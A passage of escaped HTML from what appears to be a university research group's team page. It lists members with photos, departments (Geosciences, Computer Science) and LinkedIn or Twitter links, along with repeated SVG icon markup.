90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c170-outer\">\n            <div data-colibri-id=\"182-c170\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c170 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c171\" class=\"d-block style-920 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Alex-e1697208598736.jpg\" class=\"wp-image-1782 style-920-image style-local-182-c171-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c171-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"h-global-transition-all h-heading style-914 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c172\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-text h-text-component style-915 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"style-921 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c175-outer\">\n            <div data-colibri-id=\"182-c175\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c175 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c176\" class=\"d-block style-922 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\" class=\"wp-image-1784 style-922-image style-local-182-c176-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c176-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"h-global-transition-all h-heading style-914 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c177\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-text h-text-component style-915 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"style-923 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c180-outer\">\n            <div data-colibri-id=\"182-c180\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c180 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c181\" class=\"d-block style-913 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\" class=\"wp-image-1786 style-913-image style-local-182-c181-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c181-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c182\" class=\"h-global-transition-all h-heading style-914 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c182\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-text h-text-component style-915 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"style-917 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c185-outer\">\n            <div data-colibri-id=\"182-c185\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c185 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c186\" class=\"d-block style-913 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\" class=\"wp-image-1788 style-913-image style-local-182-c186-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c186-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c187\" class=\"h-global-transition-all h-heading style-914 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c187\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-text h-text-component style-915 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"style-917 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c190-outer\">\n            <div data-colibri-id=\"182-c190\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c190 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c191\" class=\"d-block style-913 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\" class=\"wp-image-1790 style-913-image style-local-182-c191-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c191-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c192\" class=\"h-global-transition-all h-heading style-914 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c192\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-text h-text-component style-915 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"style-917 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c195 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-913 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\" class=\"wp-image-1792 style-913-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-914 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-915 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c199-outer\">\n            <div data-colibri-id=\"182-c199\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c199 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c200\" class=\"d-block style-913 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\" class=\"wp-image-1794 style-913-image style-local-182-c200-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c200-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c201\" class=\"h-global-transition-all h-heading style-914 style-local-182-c201 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c201\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c202\" class=\"h-text h-text-component style-915 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"style-917 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c204-outer\">\n            <div data-colibri-id=\"182-c204\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c204 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c205\" class=\"d-block style-913 style-local-182-c205 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\" class=\"wp-image-1795 style-913-image style-local-182-c205-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c205-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c206\" class=\"h-global-transition-all h-heading style-914 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c206\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Eliza Schuh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-text h-text-component style-915 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"style-917 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      